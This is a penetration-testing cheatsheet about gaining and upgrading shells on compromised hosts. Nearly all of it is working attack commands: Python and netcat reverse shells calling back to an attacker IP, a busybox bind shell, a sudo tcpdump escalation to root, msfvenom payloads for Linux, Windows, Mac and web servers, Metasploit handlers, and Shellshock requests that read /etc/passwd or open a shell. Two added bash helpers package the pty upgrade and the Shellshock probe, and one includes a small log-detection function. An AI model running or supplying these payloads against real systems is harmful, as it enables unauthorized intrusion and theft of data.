Cheatsheet_Shells.txt
Netcat Shell Listener
`nc -nlvp 4444`
Spawning a TTY Shell - Break out of Jail or limited shell
You should almost always upgrade your shell after taking control of an apache or www user.
(For example when you get the error "sh: no job control in this shell" while trying to run an exploit)
(hint: sudo -l to see what you can run)
You may encounter limited shells that use rbash and only allow you to execute a single command per session.
You can overcome this by using SSH to run a single command on the target that calls back to a netcat listener on your own machine (`nc -nlvp 4444`; the target's nc must support -e):
`ssh user@$ip nc $localip 4444 -e /bin/sh`
enter user's password
Then upgrade the dumb shell to a pty and set a terminal type:
`python -c 'import pty; pty.spawn("/bin/sh")'`
`export TERM=linux`
`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
From within python: `import os; os.system('/bin/bash')`
`/bin/sh -i`
`perl -e 'exec "/bin/sh";'`
From within perl: `exec "/bin/sh";`
From within ruby: `exec "/bin/sh"`
From within lua: `os.execute('/bin/sh')`
From within IRB: `exec "/bin/sh"`
From within vi or vim: `:!bash`
or
`:set shell=/bin/bash` followed by `:shell`
From within nmap (interactive mode, `nmap --interactive`, present only in old releases): `!sh`
From within tcpdump (when it can be run via sudo; -z runs a post-rotate command and -Z picks the user it runs as):
echo -e "id\n/bin/netcat $ip 443 -e /bin/bash" > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
From busybox: `/bin/busybox telnetd -l /bin/sh -p 9999` (then telnet to port 9999 for a shell)
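The pty-upgrade steps above as a reusable helper, added here as an example (not the cheatsheet author's code). Run it on the target after catching a dumb shell: it prints the one-liner for the first pty-capable interpreter actually present, tells you whether you landed in rbash, and prints the terminal-size line to paste after `stty raw -echo; fg`. The candidate order (python3, python, python2, then util-linux script) and the function names are my choice.

```bash
#!/usr/bin/env bash
# Added example for the "spawn a TTY" step; not from the original cheatsheet.

# Print the one-liner for the first pty-capable interpreter on this box.
# $1 = shell to spawn inside the pty (default /bin/bash)
pick_pty_spawner() {
    local sh="${1:-/bin/bash}" cand
    for cand in python3 python python2; do
        if command -v "$cand" >/dev/null 2>&1; then
            printf "%s -c 'import pty; pty.spawn(\"%s\")'\n" "$cand" "$sh"
            return 0
        fi
    done
    # script(1) from util-linux allocates a pty too:
    # -q quiet, -c command to run, typescript goes to /dev/null
    if command -v script >/dev/null 2>&1; then
        printf 'script -qc %s /dev/null\n' "$sh"
        return 0
    fi
    echo 'no pty-capable interpreter found' >&2
    return 1
}

# Is the shell we landed in a restricted one (rbash and friends)?
# Checks the name only; $1 overrides $SHELL so it can be tested.
is_restricted_shell() {
    case "${1:-$SHELL}" in
        rbash|*/rbash|rksh|*/rksh|rzsh|*/rzsh) return 0 ;;
    esac
    return 1
}

# After the pty is up: Ctrl-Z, then on the attacker box `stty raw -echo; fg`,
# then paste the line this prints into the remote shell so full-screen
# programs (vim, less, su prompts) get the right size.
# $1/$2 = rows/cols of the local terminal (from `stty size`).
remote_term_setup() {
    printf 'export TERM=xterm; reset; stty rows %d cols %d\n' "$1" "$2"
}
```

Typical use: `pick_pty_spawner /bin/bash` on the target, then `remote_term_setup $(stty size)` locally and paste its output into the upgraded shell.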
Pentestmonkey PHP reverse shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
php-findsock-shell - turns PHP port 80 into an interactive shell
http://pentestmonkey.net/tools/web-shells/php-findsock-shell
Perl Reverse Shell
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
PHP powered web browser Shell b374k with file upload etc.
https://github.com/b374k/b374k
Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
Web Backdoors from Fuzzdb
https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
*Linux*
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`
*Windows*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`
*Mac*
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`
**Web Payloads**
*PHP*
`msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
OR
`msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
Then add `<?php` as the first line of the file so that it executes as a PHP page (check the file first: newer msfvenom releases already emit an opening tag). The one-liner below relies on macOS pbcopy/pbpaste; elsewhere prepend the tag with your editor:
`cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`
*ASP*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp`
*JSP*
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp`
*WAR*
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war`
**Scripting Payloads**
*Python*
`msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py`
*Bash*
`msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh`
*Perl*
`msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl`
**Shellcode**
For all shellcode see `msfvenom --help-formats` (or `msfvenom --list formats` on current releases) for the valid output formats. Msfvenom will output code that can be pasted into your exploit in that language.
*Linux Based Shellcode*
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
*Windows Based Shellcode*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
*Mac Based Shellcode*
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
**Handlers**
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are filled in, save the lines above to a resource file and start the handler with `msfconsole -r <resource file>`.
- SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
use auxiliary/scanner/ssh/ssh_login
use post/multi/manage/shell_to_meterpreter
Shellshock
Testing for shell shock with NMap
`nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`
git clone https://github.com/nccgroup/shocker
`./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`
Shell Shock SSH Forced Command
Check for a forced command by enabling all debug output with ssh:
`ssh -vvv -i noob noob@$ip`
If the forced command runs under a vulnerable bash, the command you pass is exported to it as the SSH_ORIGINAL_COMMAND environment variable, which is enough to trigger the bug:
`ssh -i noob noob@$ip '() { :;}; /bin/bash'`
Once the shell lands, `cat file` to view file contents.
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost:vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost:vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
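The Shellshock HTTP probes above, packaged as functions. This is an added example written for this page, not from the cheatsheet author: it builds the same request the echo/nc lines send, checks a saved reply for a marker, and counts the same `() {` signature in an Apache access log so the defender side can spot the probe. The target, the CGI path, the X-Shock header name and the sample log lines are constructed placeholders.

```bash
#!/usr/bin/env bash
# Added example for the Shellshock probes above; not from the original cheatsheet.

# Raw request. $1 = CGI path, $2 = Host header, $3 = command to inject.
# Apache exports User-Agent to the CGI as HTTP_USER_AGENT; a vulnerable bash
# imports the "() { :;};" prologue as a function and runs what follows it.
shellshock_probe() {
    printf 'HEAD %s HTTP/1.1\r\nUser-Agent: () { :;}; %s\r\nHost: %s\r\nConnection: close\r\n\r\n' \
        "$1" "$3" "$2"
}

# Injected command shaped as a header line. mod_cgi parses the script's first
# output lines as headers: a "Name: value" line is relayed to us even on HEAD,
# while output with no colon (plain `id`) is a malformed header and yields a 500.
# The one-line `echo $(</etc/passwd)` form above survives the same way, since
# it starts with "root:".
SHOCK_CMD='echo X-Shock: $(id)'

# Send the probe and save the reply (network side, not exercised offline).
# $1 = host, $2 = port, $3 = CGI path, $4 = output file.
shellshock_send() {
    shellshock_probe "$3" "$1" "$SHOCK_CMD" | nc -w 5 "$1" "$2" > "$4"
}

# Did the injected command run? $1 = saved reply.
shellshock_hit() {
    grep -q '^X-Shock: uid=' "$1"
}

# Defender side: count requests in an Apache combined log carrying the prologue
# in any logged field (User-Agent and Referer are both exported to CGI scripts).
# $1 = log file. grep exits 1 on zero matches, hence the "|| true".
shellshock_log_hits() {
    grep -Ec '\(\) *\{' "$1" || true
}

# Constructed sample log (not real traffic): two benign requests, one probe.
write_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2014:13:55:40 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; echo X-Shock: $(id)"
10.0.0.5 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "curl/7.38.0"
EOF
}
```

Usage against a target: `shellshock_send TARGET 80 /cgi-bin/status reply.txt && shellshock_hit reply.txt && echo vulnerable`; on the server, `shellshock_log_hits /var/log/apache2/access.log` gives the number of probe lines seen.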